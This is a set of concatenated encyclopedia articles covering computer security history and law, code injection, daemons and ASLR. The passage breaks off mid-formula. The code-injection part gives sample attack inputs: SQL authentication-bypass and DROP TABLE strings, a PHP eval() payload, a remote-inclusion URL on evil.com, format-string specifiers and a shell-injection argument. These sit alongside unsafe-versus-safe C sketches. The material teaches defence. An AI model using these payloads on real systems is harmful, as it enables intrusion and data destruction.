targeted in the breach included personally identifiable information such as Social Security numbers, names, dates and places of birth, addresses, and fingerprints of current and former government employees as well as anyone who had undergone a government background check.[212][213] It is believed the hack was perpetrated by Chinese hackers.[214] In July 2015, a hacker group known as The Impact Team successfully breached the extramarital relationship website Ashley Madison, created by Avid Life Media. The group claimed that they had taken not only company data but user data as well.
After the breach, The Impact Team dumped emails from the company's CEO to prove their point and threatened to dump customer data unless the website was taken down permanently.[215] When Avid Life Media did not take the site offline, the group released two more compressed files, one of 9.7 GB and the second of 20 GB. After the second data dump, Avid Life Media CEO Noel Biderman resigned, but the website remained functional. In May 2021, a cyber attack took down the largest fuel pipeline in the U.S. and led to shortages across the East Coast.[216] International legal issues of cyber attacks are complicated in nature. There is no global base of common rules to judge, and eventually punish, cybercrimes and cybercriminals – and where security firms or agencies do locate the cybercriminal behind the creation of a particular piece of malware or form of cyber attack, often the local authorities cannot take action due to lack of laws under which to prosecute.[217][218] Proving attribution for cybercrimes and cyberattacks is also a major problem for all law enforcement agencies. "Computer viruses switch from one country to another, from one jurisdiction to another – moving around the world, using the fact that we don't have the capability to globally police operations like this. So the Internet is as if someone [had] given free plane tickets to all the online criminals of the world."[217] The use of techniques such as dynamic DNS, fast flux and bullet proof servers adds to the difficulty of investigation and enforcement. The role of the government is to make regulations to force companies and organizations to protect their systems, infrastructure and information from any cyberattacks, but also to protect its own national infrastructure, such as the national power grid.[219] The government's regulatory role in cyberspace is complicated. For some, cyberspace was seen as a virtual space that was to remain free of government intervention, as can be seen in many of today's libertarian blockchain and bitcoin discussions.[220] Many government officials and experts think that the government should do more and that there is a crucial need for improved regulation, mainly due to the failure of the private sector to solve the cybersecurity problem efficiently. R. Clarke said during a panel discussion at the RSA Security Conference in San Francisco that he believes the "industry only responds when you threaten regulation. If the industry doesn't respond (to the threat), you have to follow through."[221] On the other hand, executives from the private sector agree that improvements are necessary, but think that government intervention would affect their ability to innovate efficiently. Daniel R. McCarthy analyzed this public-private partnership in cybersecurity and reflected on the role of cybersecurity in the broader constitution of political order.[222] On 22 May 2020, the UN Security Council held its second-ever informal meeting on cybersecurity to focus on cyber challenges to international peace. According to UN Secretary-General António Guterres, new technologies are too often used to violate rights.[223] Many different teams and organizations exist, including: On 14 April 2016, the European Parliament and the Council of the European Union adopted the General Data Protection Regulation (GDPR). The GDPR, which came into force on 25 May 2018, grants individuals within the European Union (EU) and the European Economic Area (EEA) the right to the protection of personal data.
The regulation requires that any entity that processes personal data incorporate data protection by design and by default. It also requires that certain organizations appoint a Data Protection Officer (DPO). The IT security association TeleTrusT, an international competence network for IT security, has existed in Germany since June 1986. Most countries have their own computer emergency response team to protect network security. Since 2010, Canada has had a cybersecurity strategy.[229][230] This functions as a counterpart document to the National Strategy and Action Plan for Critical Infrastructure.[231] The strategy has three main pillars: securing government systems, securing vital private cyber systems, and helping Canadians to be secure online.[230][231] There is also a Cyber Incident Management Framework to provide a coordinated response in the event of a cyber incident.[232][233] The Canadian Cyber Incident Response Centre (CCIRC) is responsible for mitigating and responding to threats to Canada's critical infrastructure and cyber systems. It provides support to mitigate cyber threats, technical support to respond to and recover from targeted cyber attacks, and online tools for members of Canada's critical infrastructure sectors.[234] It posts regular cybersecurity bulletins[235] and operates an online reporting tool where individuals and organizations can report a cyber incident.[236] To inform the general public on how to protect themselves online, Public Safety Canada has partnered with STOP.THINK.CONNECT, a coalition of non-profit, private sector, and government organizations,[237] and launched the Cyber Security Cooperation Program.[238][239] They also run the GetCyberSafe portal for Canadian citizens, and Cyber Security Awareness Month during October.[240] Public Safety Canada aimed to begin an evaluation of Canada's cybersecurity strategy in early 2015.[231] The Australian federal government announced an $18.2 million investment to fortify the cybersecurity resilience of small and medium enterprises (SMEs) and enhance their capabilities in responding to cyber threats. This financial backing is an integral component of the 2023-2030 Australian Cyber Security Strategy, which at the time of the announcement was slated for release within the week. A substantial allocation of $7.2 million is earmarked for the establishment of a voluntary cyber health check program, allowing businesses to conduct a comprehensive, tailored self-assessment of their cybersecurity maturity. The health check serves as a diagnostic tool, helping enterprises gauge how well they meet Australia's cyber security regulations, and gives them access to a repository of educational resources and materials for building the skills necessary for an elevated cybersecurity posture. The initiative was jointly announced by Minister for Cyber Security Clare O'Neil and Minister for Small Business Julie Collins.[241] Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000.[242] The National Cyber Security Policy 2013 is a policy framework by the Ministry of Electronics and Information Technology (MeitY) which aims to protect the public and private infrastructure from cyberattacks, and safeguard "information, such as personal information (of web users), financial and banking information and sovereign data". CERT-In is the nodal agency which monitors the cyber threats in the country.
The post ofNational Cyber Security Coordinatorhas also been created in thePrime Minister's Office (PMO). The Indian Companies Act 2013 has also introduced cyber law and cybersecurity obligations on the part of Indian directors. Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000 Update in 2013.[243] Following cyberattacks in the first half of 2013, when the government, news media, television stations, and bank websites were compromised, the national government committed to the training of 5,000 new cybersecurity experts by 2017. The South Korean government blamed its northern counterpart for these attacks, as well as incidents that occurred in 2009, 2011,[244]and 2012, but Pyongyang denies the accusations.[245] TheUnited Stateshas its first fully formed cyber plan in 15 years, as a result of the release of this National Cyber plan.[246]In this policy, the US says it will: Protect the country by keeping networks, systems, functions, and data safe; Promote American wealth by building a strong digital economy and encouraging strong domestic innovation; Peace and safety should be kept by making it easier for the US to stop people from using computer tools for bad things, working with friends and partners to do this; and increase the United States' impact around the world to support the main ideas behind an open, safe, reliable, and compatible Internet.[247] The new U.S. cyber strategy[248]seeks to allay some of those concerns by promoting responsible behavior incyberspace, urging nations to adhere to a set of norms, both through international law and voluntary standards. It also calls for specific measures to harden U.S. government networks from attacks, like the June 2015 intrusion into theU.S. Office of Personnel Management(OPM), which compromised the records of about 4.2 million current and former government employees. And the strategy calls for the U.S. to continue to name and shame bad cyber actors, calling them out publicly for attacks when possible, along with the use of economic sanctions and diplomatic pressure.[249] The 198618 U.S.C.§ 1030, theComputer Fraud and Abuse Actis the key legislation. It prohibits unauthorized access or damage ofprotected computersas defined in18 U.S.C.§ 1030(e)(2). Although various other measures have been proposed[250][251]– none have succeeded. In 2013,executive order13636Improving Critical Infrastructure Cybersecuritywas signed, which prompted the creation of theNIST Cybersecurity Framework. In response to theColonial Pipeline ransomware attack[252]PresidentJoe Bidensigned Executive Order 14028[253]on May 12, 2021, to increase software security standards for sales to the government, tighten detection and security on existing systems, improve information sharing and training, establish a Cyber Safety Review Board, and improve incident response. TheGeneral Services Administration(GSA) has[when?]standardized thepenetration testservice as a pre-vetted support service, to rapidly address potential vulnerabilities, and stop adversaries before they impact US federal, state and local governments. These services are commonly referred to as Highly Adaptive Cybersecurity Services (HACS). 
TheDepartment of Homeland Securityhas a dedicated division responsible for the response system,risk managementprogram and requirements for cybersecurity in the United States called theNational Cyber Security Division.[254][255]The division is home to US-CERT operations and the National Cyber Alert System.[255]The National Cybersecurity and Communications Integration Center brings together government organizations responsible for protecting computer networks and networked infrastructure.[256] The third priority of the FBI is to: "Protect the United States against cyber-based attacks and high-technology crimes",[257]and they, along with theNational White Collar Crime Center(NW3C), and theBureau of Justice Assistance(BJA) are part of the multi-agency task force, TheInternet Crime Complaint Center, also known as IC3.[258] In addition to its own specific duties, the FBI participates alongside non-profit organizations such asInfraGard.[259][260] TheComputer Crime and Intellectual Property Section(CCIPS) operates in theUnited States Department of Justice Criminal Division. The CCIPS is in charge of investigatingcomputer crimeandintellectual propertycrime and is specialized in the search and seizure ofdigital evidencein computers andnetworks.[261]In 2017, CCIPS published A Framework for a Vulnerability Disclosure Program for Online Systems to help organizations "clearly describe authorized vulnerability disclosure and discovery conduct, thereby substantially reducing the likelihood that such described activities will result in a civil or criminal violation of law under the Computer Fraud and Abuse Act (18 U.S.C. § 1030)."[262] TheUnited States Cyber Command, also known as USCYBERCOM, "has the mission to direct, synchronize, and coordinate cyberspace planning and operations to defend and advance national interests in collaboration with domestic and international partners."[263]It has no role in the protection of civilian networks.[264][265] The U.S.Federal Communications Commission's role in cybersecurity is to strengthen the protection of critical communications infrastructure, to assist in maintaining the reliability of networks during disasters, to aid in swift recovery after, and to ensure that first responders have access to effective communications services.[266] TheFood and Drug Administrationhas issued guidance for medical devices,[267]and theNational Highway Traffic Safety Administration[268]is concerned with automotive cybersecurity. After being criticized by theGovernment Accountability Office,[269]and following successful attacks on airports and claimed attacks on airplanes, theFederal Aviation Administrationhas devoted funding to securing systems on board the planes of private manufacturers, and theAircraft Communications Addressing and Reporting System.[270]Concerns have also been raised about the futureNext Generation Air Transportation System.[271] The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry recognized knowledge, skills and abilities (KSA). 
Andersson and Reimers (2019) report these certifications range from CompTIA's A+ and Security+ through the ICS2.org's CISSP, etc.[272] Computer emergency response teamis a name given to expert groups that handle computer security incidents. In the US, two distinct organizations exist, although they do work closely together. In the context ofU.S. nuclear power plants, theU.S. Nuclear Regulatory Commission (NRC)outlines cybersecurity requirements under10 CFR Part 73, specifically in §73.54.[274] TheNuclear Energy Institute's NEI 08-09 document,Cyber Security Plan for Nuclear Power Reactors,[275]outlines a comprehensive framework forcybersecurityin thenuclear power industry. Drafted with input from theU.S. NRC, this guideline is instrumental in aidinglicenseesto comply with theCode of Federal Regulations (CFR), which mandates robust protection of digital computers and equipment and communications systems at nuclear power plants against cyber threats.[276] There is growing concern that cyberspace will become the next theater of warfare. As Mark Clayton fromThe Christian Science Monitorwrote in a 2015 article titled "The New Cyber Arms Race": In the future, wars will not just be fought by soldiers with guns or with planes that drop bombs. They will also be fought with the click of a mouse a half a world away that unleashes carefully weaponized computer programs that disrupt or destroy critical industries like utilities, transportation, communications, and energy. Such attacks could also disable military networks that control the movement of troops, the path of jet fighters, the command and control of warships.[277] This has led to new terms such ascyberwarfareandcyberterrorism. TheUnited States Cyber Commandwas created in 2009[278]and many other countrieshave similar forces. There are a few critical voices that question whether cybersecurity is as significant a threat as it is made out to be.[279][280][281] Cybersecurity is a fast-growing field ofITconcerned with reducing organizations' risk of hack or data breaches.[282]According to research from the Enterprise Strategy Group, 46% of organizations say that they have a "problematic shortage" of cybersecurity skills in 2016, up from 28% in 2015.[283]Commercial, government and non-governmental organizations all employ cybersecurity professionals. The fastest increases in demand for cybersecurity workers are in industries managing increasing volumes of consumer data such as finance, health care, and retail.[284]However, the use of the termcybersecurityis more prevalent in government job descriptions.[285] Typical cybersecurity job titles and descriptions include:[286] Student programs are also available for people interested in beginning a career in cybersecurity.[290][291]Meanwhile, a flexible and effective option for information security professionals of all experience levels to keep studying is online security training, including webcasts.[292][293]A wide range of certified courses are also available.[294] In the United Kingdom, a nationwide set of cybersecurity forums, known as theU.K Cyber Security Forum, were established supported by the Government's cybersecurity strategy[295]in order to encourage start-ups and innovation and to address the skills gap[296]identified by theU.K Government. In Singapore, theCyber Security Agencyhas issued a Singapore Operational Technology (OT) Cybersecurity Competency Framework (OTCCF). The framework defines emerging cybersecurity roles in Operational Technology. 
The OTCCF was endorsed by theInfocomm Media Development Authority(IMDA). It outlines the different OT cybersecurity job positions as well as the technical skills and core competencies necessary. It also depicts the many career paths available, including vertical and lateral advancement opportunities.[297] The following terms used with regards to computer security are explained below: Since theInternet's arrival and with the digital transformation initiated in recent years, the notion of cybersecurity has become a familiar subject in both our professional and personal lives. Cybersecurity and cyber threats have been consistently present for the last 60 years of technological change. In the 1970s and 1980s, computer security was mainly limited toacademiauntil the conception of the Internet, where, with increased connectivity, computer viruses and network intrusions began to take off. After the spread of viruses in the 1990s, the 2000s marked the institutionalization of organized attacks such asdistributed denial of service.[301]This led to the formalization of cybersecurity as a professional discipline.[302] TheApril 1967 sessionorganized byWillis Wareat theSpring Joint Computer Conference, and the later publication of theWare Report, were foundational moments in the history of the field of computer security.[303]Ware's work straddled the intersection of material, cultural, political, and social concerns.[303] A 1977NISTpublication[304]introduced theCIA triadof confidentiality, integrity, and availability as a clear and simple way to describe key security goals.[305]While still relevant, many more elaborate frameworks have since been proposed.[306][307] However, in the 1970s and 1980s, there were no grave computer threats because computers and the internet were still developing, and security threats were easily identifiable. More often, threats came from malicious insiders who gained unauthorized access to sensitive documents and files. Although malware and network breaches existed during the early years, they did not use them for financial gain. By the second half of the 1970s, established computer firms likeIBMstarted offering commercial access control systems and computer security software products.[308] One of the earliest examples of an attack on a computer network was thecomputer wormCreeperwritten by Bob Thomas atBBN, which propagated through theARPANETin 1971.[309]The program was purely experimental in nature and carried no malicious payload. A later program,Reaper, was created byRay Tomlinsonin 1972 and used to destroy Creeper.[citation needed] Between September 1986 and June 1987, a group of German hackers performed the first documented case of cyber espionage.[310]The group hacked into American defense contractors, universities, and military base networks and sold gathered information to the Soviet KGB. The group was led byMarkus Hess, who was arrested on 29 June 1987. He was convicted of espionage (along with two co-conspirators) on 15 Feb 1990. In 1988, one of the first computer worms, called theMorris worm, was distributed via the Internet. 
It gained significant mainstream media attention.[311] Netscape started developing the SSL protocol shortly after the National Center for Supercomputing Applications (NCSA) launched Mosaic 1.0, the first widely used graphical web browser, in 1993.[312][313] Netscape had SSL version 1.0 ready in 1994, but it was never released to the public due to many serious security vulnerabilities.[312] However, in 1995, Netscape launched SSL version 2.0.[314] The National Security Agency (NSA) is responsible for the protection of U.S. information systems and also for collecting foreign intelligence.[315] The agency analyzes commonly used software and system configurations to find security flaws, which it can use for offensive purposes against competitors of the United States.[316] NSA contractors created and sold click-and-shoot attack tools to US agencies and close allies, but eventually the tools made their way to foreign adversaries.[317] In 2016, the NSA's own hacking tools were hacked, and they have been used by Russia and North Korea.[citation needed] NSA employees and contractors have been recruited at high salaries by adversaries anxious to compete in cyberwarfare.[citation needed] In 2007, the United States and Israel began exploiting security flaws in the Microsoft Windows operating system to attack and damage equipment used in Iran to refine nuclear materials. Iran responded by heavily investing in its own cyberwarfare capability, which it began using against the United States.[316]
https://en.wikipedia.org/wiki/Software_security
Code injection is a computer security exploit where a program fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. An attacker using this method "injects" code into the program while it is running. Successful exploitation of a code injection vulnerability can result in data breaches, access to restricted or critical computer systems, and the spread of malware.

Code injection vulnerabilities occur when an application sends untrusted data to an interpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers, operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other program arguments. Injection flaws can be identified through source code examination,[1] static analysis, or dynamic testing methods such as fuzzing.[2]

There are numerous types of code injection vulnerabilities, but most are errors in interpretation: they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine "Who's on First?".

Code injection can be used maliciously for many purposes, including reading or modifying data in a database, installing malware, escalating privileges, and attacking the users of a web application. Code injections that target the Internet of Things could also lead to severe consequences such as data breaches and service disruption.[3]

Code injections can occur in any type of program running with an interpreter. Carrying out such an injection is often trivial, which is one of the primary reasons why server software is kept away from direct user access. Code injection can also be observed first-hand using a browser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology (NIST) in the National Vulnerability Database (NVD) as CWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities.[4]

Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent,[5][6] such as exposing a data field or filtering option that the original design did not provide. Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. Another benign use of code injection is the discovery of injection flaws in order to find and fix vulnerabilities. This is known as a penetration test.

To prevent code injection problems, developers can use secure input and output handling strategies such as input validation, parameterized queries, and output encoding or escaping. The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. A number of approaches exist to detect and isolate both managed and unmanaged code injections.

An SQL injection takes advantage of SQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query.[13]

For example, consider a web page that has two text fields which allow users to enter a username and a password. The code behind the page will generate an SQL query to check the password against the list of user names; a sketch of such a query appears below. If this query returns any rows, then access is granted.
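The query-generating code referred to above is not reproduced in this text. The following is a minimal sketch of the pattern being described, written in C against the SQLite C API; the Users table, its column names, and the plain-text password comparison are illustrative assumptions rather than details from the original example. The unsafe version splices user input directly into the SQL text, while the parameterized version keeps the input as pure data:

    #include <stdio.h>
    #include <sqlite3.h>
    /* build with: cc login.c -lsqlite3 */

    /* UNSAFE: user input is concatenated straight into the SQL text.
       Input such as  ' OR '1'='1  changes the meaning of the query. */
    int check_login_unsafe(sqlite3 *db, const char *user, const char *pass) {
        char sql[512];
        snprintf(sql, sizeof sql,
                 "SELECT 1 FROM Users WHERE Username = '%s' AND Password = '%s';",
                 user, pass);
        sqlite3_stmt *stmt;
        if (sqlite3_prepare_v2(db, sql, -1, &stmt, NULL) != SQLITE_OK) return 0;
        int granted = (sqlite3_step(stmt) == SQLITE_ROW);  /* any row => access */
        sqlite3_finalize(stmt);
        return granted;
    }

    /* SAFER: a parameterized query; the driver treats the input purely as data. */
    int check_login_safe(sqlite3 *db, const char *user, const char *pass) {
        sqlite3_stmt *stmt;
        const char *sql =
            "SELECT 1 FROM Users WHERE Username = ?1 AND Password = ?2;";
        if (sqlite3_prepare_v2(db, sql, -1, &stmt, NULL) != SQLITE_OK) return 0;
        sqlite3_bind_text(stmt, 1, user, -1, SQLITE_TRANSIENT);
        sqlite3_bind_text(stmt, 2, pass, -1, SQLITE_TRANSIENT);
        int granted = (sqlite3_step(stmt) == SQLITE_ROW);
        sqlite3_finalize(stmt);
        return granted;
    }

With the unsafe version, the ' OR '1'='1 input discussed next turns the WHERE clause into a condition that is always true.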
However, if a malicious user enters a valid username and injects valid SQL such as Password' OR '1'='1 in the password field, the resulting query will compare the stored password against 'Password' OR '1'='1'. Here "Password" is assumed to be blank or some innocuous string, and '1'='1' is always true, so many rows will be returned, thereby allowing access.

The technique may be refined to allow multiple statements to run, or even to load and run external programs. For example, given a query of the same general form, if an adversary supplies ';DROP TABLE User; --' as the user ID and 'OR"=' as the password, the User table will be removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one, while -- signifies the start of a comment.

Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users and typically receives harmless messages such as short greetings. However, a malicious person may know of a code injection vulnerability in the guestbook and submit a message containing a script element instead. If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code.

HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions about what input data is possible or about the effects of special data.[14]

Template engines are often used in modern web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities[15] such as server-side template injection. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. For example, in a template such as Hello {{visitor_name}}, the placeholder {{visitor_name}} is replaced with data during the rendering process. An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor_name. Depending on the implementation of the web application, the attacker could choose to inject {{7*'7'}}, which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to remote code execution.

An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call.[16] The argument of eval will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo".

PHP allows serialization and deserialization of whole objects.
If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks.[17] Such an attack on Joomla was found in 2013.[18]

Consider a PHP program that includes a file specified by a request parameter. The example expects a color to be provided, while attackers might provide COLOR=http://evil.com/exploit, causing PHP to load the remote file.

Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. For example, consider a short C program with a local character array password that holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. If the user input is filled with a list of format specifiers, such as %s%s%s%s%s%s%s%s, then printf() will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print Password1 to the screen.

Shell injection (or command injection[19]) is named after UNIX shells but applies to most systems that allow software to programmatically execute a command line. As an example, consider a vulnerable tcsh script, stored in the executable file ./check, that compares its first argument against the constant 1. The shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack.[20]

Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider a short PHP program, running on a web server, that runs an external program called funnytext to replace a word the user sent with some other word. The passthru function in such a program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features.[21]

Some languages offer functions to properly escape or quote strings that are used to construct shell commands, such as PHP's escapeshellarg() and escapeshellcmd(). However, this still puts the burden on programmers to know about these functions and to remember to use them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly rather than through a shell, thus preventing the possibility of shell injection; however, these APIs tend not to support various convenience features of shells and tend to be more cumbersome and verbose than concise shell syntax. A sketch contrasting the two approaches is given below.
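The PHP listings described above are not reproduced here. As a hedged illustration of the difference between composing a shell command and executing a program directly, the following C sketch assumes a hypothetical /usr/local/bin/funnytext helper (the program name comes from the text; the path is an assumption). The first function is vulnerable to shell injection; the second passes the user's word as a single argument with no shell involved:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    /* UNSAFE: the user-supplied word is spliced into a shell command line.
       Input such as  hello; rm -rf ~  injects a second command. */
    void run_funnytext_unsafe(const char *word) {
        char cmd[256];
        snprintf(cmd, sizeof cmd, "/usr/local/bin/funnytext %s", word);
        system(cmd);                      /* the shell parses the whole string */
    }

    /* SAFER: the program is executed directly, with the word passed as a single
       argument vector entry; no shell ever parses the input. */
    void run_funnytext_safe(const char *word) {
        pid_t pid = fork();
        if (pid == 0) {                   /* child */
            execl("/usr/local/bin/funnytext", "funnytext", word, (char *)NULL);
            _exit(127);                   /* exec failed */
        } else if (pid > 0) {
            waitpid(pid, NULL, 0);        /* parent waits for the child */
        }
    }

An input such as hello; rm -rf ~ would be executed by the shell in the first version but treated as an ordinary argument string in the second.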
https://en.wikipedia.org/wiki/Command_injection
Inmultitaskingcomputeroperating systems, adaemon(/ˈdiːmən/or/ˈdeɪmən/)[1]is acomputer programthat runs as abackground process, rather than being under the direct control of an interactive user. Traditionally, the process names of a daemon end with the letterd, for clarification that the process is in fact a daemon, and for differentiation between a daemon and a normal computer program. For example,syslogdis a daemon that implements system logging facility, andsshdis a daemon that serves incomingSSHconnections. In aUnixenvironment, theparent processof a daemon is often, but not always, theinitprocess. A daemon is usually created either by a processforkinga child process and then immediately exiting, thus causing init to adopt the child process, or by the init process directly launching the daemon. In addition, a daemon launched by forking and exiting typically must perform other operations, such as dissociating the process from any controllingterminal(tty). Such procedures are often implemented in various convenience routines such asdaemon(3)in Unix. Systems often start daemons atboottime that will respond to network requests, hardware activity, or other programs by performing some task. Daemons such ascronmay also perform defined tasks at scheduled times. The term was coined by the programmers atMIT's Project MAC. According toFernando J. Corbató, who worked onProject MACaround 1963, his team was the first to use the term daemon, inspired byMaxwell's demon, an imaginary agent in physics andthermodynamicsthat helped to sort molecules, stating, "We fancifully began to use the word daemon to describe background processes that worked tirelessly to perform system chores".[2]Unixsystems inherited this terminology. Maxwell's demon is consistent with Greek mythology's interpretation of adaemonas a supernatural being working in the background. In the general sense, daemon is an older form of the word "demon", from theGreekδαίμων. In theUnix System Administration HandbookEvi Nemethstates the following about daemons:[3] Many people equate the word "daemon" with the word "demon", implying some kind ofsatanicconnection between UNIX and theunderworld. This is an egregious misunderstanding. "Daemon" is actually a much older form of "demon"; daemons have no particular bias towards good or evil, but rather serve to help define a person's character or personality. Theancient Greeks' concept of a "personal daemon" was similar to the modern concept of a "guardian angel"—eudaemoniais the state of being helped or protected by a kindly spirit. As a rule, UNIX systems seem to be infested with both daemons and demons. In modern usage in the context of computer software, the worddaemonis pronounced/ˈdiːmən/DEE-mənor/ˈdeɪmən/DAY-mən.[1] Alternative terms fordaemonareservice(used in Windows, from Windows NT onwards, and later also in Linux),started task(IBMz/OS),[4]andghost job(XDSUTS). Sometimes the more general termserverorserver processis used, particularly for daemons that operate as part ofclient-server systems.[5] After the term was adopted for computer use, it was rationalized as abackronymfor Disk And Execution MONitor.[6][1] Daemons that connect to a computer network are examples ofnetwork services. In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned theinitprocess (process number 1) as its parent process and has no controlling terminal. 
However, more generally, a daemon may be any background process, whether a child of the init process or not.

On a Unix-like system, the common method for a process to become a daemon, when the process is started from the command line or from a startup script such as an init script or a SystemStarter script, involves dissociating the process from its controlling terminal and from its parent's environment: typically the process forks and the parent exits (so that init adopts the child), the child calls setsid() to start a new session with no controlling terminal, optionally forks a second time, changes its working directory to the root directory, resets its file mode creation mask, and closes or redirects its standard file descriptors. (A minimal C sketch of this sequence appears below.) If the process is started by a super-server daemon, such as inetd, launchd, or systemd, the super-server daemon will perform those functions for the process,[7][8][9] except for old-style daemons not converted to run under systemd and specified as Type=forking[9] and "multi-threaded" datagram servers under inetd.[7]

In the Microsoft DOS environment, daemon-like programs were implemented as terminate-and-stay-resident programs (TSR). On Microsoft Windows NT systems, programs called Windows services perform the functions of daemons. They run as processes, usually do not interact with the monitor, keyboard, and mouse, and may be launched by the operating system at boot time. In Windows 2000 and later versions, Windows services are configured and manually started and stopped using the Control Panel, a dedicated control/configuration program, the Service Controller component of the Service Control Manager (sc command), the net start and net stop commands, or the PowerShell scripting system. However, any Windows application can perform the role of a daemon, not just a service, and some Windows daemons have the option of running as a normal process.

On the classic Mac OS, optional features and services were provided by files loaded at startup time that patched the operating system; these were known as system extensions and control panels. Later versions of classic Mac OS augmented these with fully fledged faceless background applications: regular applications that ran in the background. To the user, these were still described as regular system extensions. macOS, which is a Unix system, uses daemons, but uses the term "services" to designate software that performs functions selected from the Services menu, rather than using that term for daemons as Windows does.
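As a hedged illustration of the classical sequence described above (a minimal sketch only; production daemons usually call daemon(3) or are supervised directly by systemd or launchd rather than daemonizing by hand):

    #include <fcntl.h>
    #include <stdlib.h>
    #include <sys/stat.h>
    #include <unistd.h>

    /* A minimal, classical daemonization sequence (error handling trimmed). */
    static void daemonize(void) {
        if (fork() > 0) exit(0);      /* parent exits; init/systemd adopts child */
        setsid();                     /* new session: no controlling terminal    */
        if (fork() > 0) exit(0);      /* second fork: can never reacquire a tty  */
        umask(0);                     /* reset file mode creation mask           */
        chdir("/");                   /* do not keep any directory in use        */
        for (int fd = 0; fd < 3; fd++) close(fd);   /* stdin, stdout, stderr     */
        open("/dev/null", O_RDWR);    /* becomes fd 0 */
        dup(0);                       /* becomes fd 1 */
        dup(0);                       /* becomes fd 2 */
    }

    int main(void) {
        daemonize();
        /* ... perform background work, e.g. respond to requests or timers ... */
        for (;;) sleep(60);
    }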
https://en.wikipedia.org/wiki/Daemon_(computing)
Address space layout randomization(ASLR) is acomputer securitytechnique involved in preventingexploitationofmemory corruptionvulnerabilities.[1]In order to prevent an attacker from reliably redirecting code execution to, for example, a particular exploited function in memory, ASLR randomly arranges theaddress spacepositions of key data areas of aprocess, including the base of theexecutableand the positions of thestack,heapandlibraries. When applied to the kernel, this technique is calledkernel address space layout randomization(KASLR).[2] The LinuxPaXproject first coined the term "ASLR", and published the first design andimplementation of ASLRin July 2001 as apatchfor theLinux kernel. It is seen as a complete implementation, providing a patch for kernel stack randomization since October 2002.[3] The first mainstream operating system to support ASLR by default wasOpenBSDversion3.4in 2003,[4][5]followed by Linux in 2005. Address space randomization hinders some types of security attacks by making it more difficult for an attacker to predict target addresses. For example, attackers trying to executereturn-to-libc attacksmust locate the code to be executed, while other attackers trying to executeshellcodeinjected on the stack have to find the stack first. In both cases, the system makes related memory-addresses unpredictable from the attackers' point of view. These values have to be guessed, and a mistaken guess is not usually recoverable due to the application crashing. Address space layout randomization is based upon the low chance of an attacker guessing the locations of randomly placed areas. Security is increased by increasing the search space. Thus, address space randomization is more effective when moreentropyis present in the random offsets. Entropy is increased by either raising the amount ofvirtual memoryarea space over which the randomization occurs or reducing the period over which the randomization occurs. The period is typically implemented as small as possible, so most systems must increase VMA space randomization. To defeat the randomization, attackers must successfully guess the positions of all areas they wish to attack. For data areas such as stack and heap, where custom code or useful data can be loaded, more than one state can be attacked by usingNOP slidesfor code or repeated copies of data. This allows an attack to succeed if the area is randomized to one of a handful of values. In contrast, code areas such as library base and main executable need to be discovered exactly. Often these areas are mixed, for examplestack framesare injected onto the stack and a library is returned into. The following variables can be declared: To calculate the probability of an attacker succeeding, a number of attemptsαcarried out without being interrupted by a signature-based IPS, law enforcement, or other factor must be assumed; in the case of brute forcing, the daemon cannot be restarted. The number of relevant bits and how many are being attacked in each attempt must also be calculated, leaving however many bits the attacker has to defeat. The following formulas represent the probability of success for a given set ofαattempts onNbits of entropy. In many systems,2N{\displaystyle 2^{N}}can be in the 